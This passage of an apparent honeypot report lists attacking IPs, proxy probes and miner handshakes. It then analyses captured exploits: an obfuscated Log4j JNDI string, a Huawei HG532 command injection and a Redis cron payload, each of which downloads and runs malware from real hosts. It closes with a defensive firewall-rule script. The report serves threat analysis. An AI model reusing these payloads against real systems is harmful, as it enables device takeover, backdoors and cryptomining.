| 23.236.125.80 | Administrator | 1 |
| 23.248.175.138 | Administrator | 1 |
| 24.199.86.184 | beio | 1 |
| 27.115.124.104 | Administrator | 1 |
| 27.115.124.113 | Administrator | 1 |
| 27.115.124.4 | Administrator | 1 |
| 27.115.124.48 | Administrator | 1 |
| 27.115.124.49 | Administrator | 1 |
| 27.115.124.68 | Administrator | 1 |
| 27.115.124.96 | Administrator | 1 |
| 27.115.124.97 | Administrator | 1 |
| 45.40.57.179 | Administrator | 1 |
| 45.40.57.56 | Administrator | 1 |
| 45.79.124.109 | Administrator | 1 |
| 47.243.6.177 | Administrator | 1 |
| 47.250.149.87 | Administrator | 1 |
| 47.250.57.72 | Administrator | 1 |
| 47.251.25.82 | Administrator | 1 |
| 47.253.47.153 | Administrator | 1 |
| 47.89.241.142 | Administrator | 1 |
| 58.72.240.34 | User | 1 |
| 59.19.86.132 | User | 1 |
| 64.227.137.10 | beio | 1 |
| 64.227.142.101 | beio | 1 |
| 68.183.33.189 | beio | 1 |
| 69.164.217.74 | | 1 |
| 69.4.234.17 | Administr | 1 |
| 70.191.129.247 | User | 1 |
| 75.129.81.62 | User | 1 |
| 76.232.71.89 | User | 1 |
| 8.208.20.114 | Administrator | 1 |
| 8.208.26.117 | Administrator | 1 |
| 8.208.80.181 | Administrator | 1 |
| 8.208.81.165 | Administrator | 1 |
| 8.209.104.126 | Administrator | 1 |
| 8.209.217.55 | Administrator | 1 |
| 8.209.218.156 | Administrator | 1 |
| 8.209.218.31 | Administrator | 1 |
| 8.209.240.183 | Administrator | 1 |
| 8.209.69.51 | Administrator | 1 |
| 8.209.98.117 | Administrator | 1 |
| 8.217.108.150 | Administrator | 1 |
| 8.218.160.92 | Administrator | 1 |
| 8.218.244.13 | Administrator | 1 |
| 80.110.22.245 | User | 1 |
| 87.236.176.111 | elton | 1 |
| 87.236.176.121 | elton | 1 |
| 87.236.176.130 | elton | 1 |
| 87.236.176.135 | elton | 1 |
| 87.236.176.145 | elton | 1 |
| 87.236.176.178 | elton | 1 |
| 87.236.176.194 | elton | 1 |
| 87.236.176.199 | elton | 1 |
| 87.236.176.207 | elton | 1 |
| 87.236.176.209 | elton | 1 |
| 87.236.176.212 | elton | 1 |
| 87.236.176.229 | elton | 1 |
| 87.236.176.232 | elton | 1 |
| 87.236.176.239 | elton | 1 |
| 87.236.176.247 | elton | 1 |
| 87.236.176.34 | elton | 1 |
| 87.236.176.38 | elton | 1 |
| 87.236.176.50 | elton | 1 |
| 87.236.176.61 | elton | 1 |
| 87.236.176.75 | elton | 1 |
| 87.236.176.84 | elton | 1 |
| 87.236.176.91 | elton | 1 |
| 89.248.165.7 | Administr | 1 |
| 96.85.163.125 | User | 1 |

## Proxy scans

Requests that asked the honeypot to forward traffic to a third-party host, i.e. open-proxy probing. Fetching a well-known page such as www.baidu.com, or a service that echoes the client address such as ipinfo.io, is how a scanner verifies that a proxy actually works and what it looks like from outside.

| IP | Proxy target | Count |
| ----------------- | ------------------- | -----: |
| 205.185.115.70 | www.baidu.com | 152 |
| 198.98.53.107 | www.baidu.com | 127 |
| 198.144.159.126 | cn.bing.com | 79 |
| 199.195.248.153 | google.com | 24 |
| 45.128.232.152 | google.com | 19 |
| 109.207.200.43 | blank.org | 11 |
| 162.240.237.185 | google.com | 10 |
| 54.38.65.176 | www.bing.com | 10 |
| 149.5.172.27 | google.com | 8 |
| 193.35.18.54 | google.com | 7 |
| 109.207.200.42 | blank.org | 6 |
| 147.135.208.138 | www.bing.com | 6 |
| 193.35.18.51 | google.com | 6 |
| 45.83.23.218 | dnspod.qcloud.com | 6 |
| 51.75.65.136 | www.bing.com | 6 |
| 95.211.95.26 | 104.244.42.70 | 6 |
| 103.116.52.251 | fast.com | 5 |
| 194.87.151.139 | google.com | 5 |
| 194.87.151.169 | google.com | 5 |
| 45.128.232.141 | google.com | 5 |
| 45.128.232.153 | google.com | 5 |
| 45.135.232.6 | ipinfo.io | 5 |
| 51.178.86.50 | www.bing.com | 5 |
| 51.38.49.52 | www.bing.com | 5 |

## Miner traffic

`mining.subscribe` is the first message a Stratum mining client sends to a pool; these hosts were treating the honeypot as a pool endpoint. 45.148.120.113 also appears in the web GET list above.

| IP | Signature | Count |
| ---------------- | ------------------------------------------------------------------------------ | -----: |
| 185.213.175.62 | `{"id": 1, "method": "mining.subscribe", "params": ["cpuminer/2.5.1"]}` | 4 |
| 45.148.120.113 | `{"id": 1, "method": "mining.subscribe", "params": ["cpuminer/2.5.1"]}` | 4 |
| 45.148.120.187 | `{"id": 1, "method": "mining.subscribe", "params": ["cpuminer/2.5.1"]}` | 2 |

# Exploitation attempts

## log4j

Source IP: 95.214.53.99

Signature: `${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}`

URI: `/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTcyLjI0NS4xMzUuMTc1L3NlcnZlci9zc2hrZXkyIDsgY3VybCAtTyBodHRwO`

Each `${env:NaN:-x}` lookup names an environment variable that does not exist, so Log4j substitutes the default `x`; after substitution the string assembles to `${jndi:ldap:...}`, which is why a plain substring match on `${jndi:` misses it. The `/TomcatBypass/Command/Base64/<b64>` path is the URI format of the JNDIExploit tool, where the base64 segment is the command the served class will execute. The capture is cut off, so the decoded command below is incomplete.

Decoded:

⚠ The file at this address is a Linux backdoor (Backdoor/Linux.Mirai.ck). You may look at it for research, but never use it for illegal purposes and never run it; the consequences are yours. (Replace `|` with `/`.)

`wget http:||172.245.135.175|server|sshkey2 ; curl -O http`

## Huawei home gateway

Source IP: 124.220.198.204

Signature: `POST /ctrlt/DeviceUpgrade_1`

Signature 2: `$(/bin/busybox wget -g 193.47.61.150 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)`

This is the HG532 `DeviceUpgrade_1` command injection (CVE-2017-17215) as used by Mirai-family bots: the command inside `$( )` downloads a MIPS binary with BusyBox's `wget`, marks it executable and runs it, and the `selfrep.huawei` argument tags the infection vector the way those bots do. The download host 193.47.61.150 sits in the same /24 as four of the SSH brute-force sources listed above.

## Suspected Redis payload

Source IP: 185.246.222.42

Signature: `*3\r\n$3\r\nSET\r\n$3\r\nHA1\r\n$82\r\n\t\n*/10 * * * * echo Y3VybCAtZnNTTCBodHRwOi8vei5zaGF2c2wuY29tL2IK|base64 -d|sh|sh\n\t\r\n`

This is a RESP-encoded `SET HA1 <value>` whose value is a crontab line that runs every ten minutes. The tab and newline padding around it makes the value survive as a line of its own when the Redis data file is later dumped into a cron directory, which is the usual unauthenticated-Redis technique (`CONFIG SET dir`/`dbfilename` followed by `SAVE`); only the `SET` step is in this capture. The source is in the same /24 as 185.246.222.100 and 185.246.222.102 from the SSH table.

⚠ The files at these addresses have not been through any safety check and are very likely malicious. You may look at them for research, but never use them for illegal purposes and never open them; the consequences are yours. (Replace `|` with `/`.)

Resolved address A: http:||z.shavsl.com|b

Resolved address B: http:||y.shavsl.com|gif
The file at address A is a shell script whose only job is to download the file at address B. That file carries an ELF header and UPX packing signatures. After UPX unpacking and decompilation it does the following:

1. disables SELinux
2. installs an SSH backdoor
3. adds cron jobs
4. updates itself
5. verifies itself by MD5
6. runs the xmrig miner
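The report's rule list says the 96 firewall entries include whole /24 ranges and that one of the feeds is "sustained low-frequency login failures": sources such as the 22 hosts in 87.236.176.0/24 that each tried `elton` exactly once never trip a per-IP limit on their own. The following is an added example of that aggregation, not the author's firewall script. The records are constructed from rows in the RDP table above, and the thresholds (`ip_threshold=10`, `hosts_per_net=8`) and the function names are my choices, not values from the report.

```python
"""Turn failed-login records into firewall rules, collapsing sources that
share a /24 into one network rule. Added example; sample records are built
from rows of the RDP table, not exported from the author's honeypot."""
import ipaddress
from collections import Counter, defaultdict
from typing import Dict, Iterable, List, Tuple

Record = Tuple[str, str, int]  # (source IP, username tried, failed attempts)

SAMPLE: List[Record] = (
    [("194.26.135.75", "Administr", 1174), ("179.60.147.47", "Administr", 274),
     ("5.180.186.100", "hello", 27), ("143.42.63.203", "24xh2hzy", 1)]
    # 22 hosts, one attempt each: invisible to a per-IP threshold
    + [(f"87.236.176.{h}", "elton", 1) for h in
       (111, 121, 130, 135, 145, 178, 194, 199, 207, 209, 212,
        229, 232, 239, 247, 34, 38, 50, 61, 75, 84, 91)]
    # four hosts in one /24: too few to block the whole range
    + [(f"45.81.39.{h}", "Administr", 1) for h in (222, 223, 224, 230)]
)


def _net24(ip: str) -> ipaddress.IPv4Network:
    return ipaddress.ip_network(f"{ip}/24", strict=False)


def build_rules(records: Iterable[Record], ip_threshold: int = 10,
                hosts_per_net: int = 8) -> List[str]:
    """Block a host once it exceeds ip_threshold failures, and a whole /24 once
    hosts_per_net distinct hosts in it have failed at least once. A host whose
    /24 is already blocked gets no separate rule."""
    per_ip: Counter = Counter()
    hosts_in_net: Dict[ipaddress.IPv4Network, set] = defaultdict(set)
    for ip, _user, n in records:
        per_ip[ip] += n
        hosts_in_net[_net24(ip)].add(ip)

    rules = {str(net) for net, hosts in hosts_in_net.items()
             if len(hosts) >= hosts_per_net}
    for ip, n in per_ip.items():
        if n >= ip_threshold and str(_net24(ip)) not in rules:
            rules.add(f"{ip}/32")
    return sorted(rules, key=ipaddress.ip_network)


def is_blocked(rules: Iterable[str], ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in ipaddress.ip_network(r) for r in rules)


def username_spread(records: Iterable[Record]) -> Dict[str, int]:
    """How many distinct /24s tried each username: a name seen from many
    unrelated networks (like `beio` in the table) marks a distributed campaign
    rather than one noisy host."""
    nets: Dict[str, set] = defaultdict(set)
    for ip, user, _n in records:
        nets[user].add(_net24(ip))
    return {user: len(n) for user, n in nets.items()}


if __name__ == "__main__":
    for rule in build_rules(SAMPLE):
        print(rule)
    print(username_spread(SAMPLE))
```

With the sample data this yields three host rules and one network rule (`87.236.176.0/24`), while the four 45.81.39.x hosts stay unblocked; in a real deployment the /24 threshold is the knob that trades false positives in shared hosting ranges against catching this kind of slow, distributed brute force.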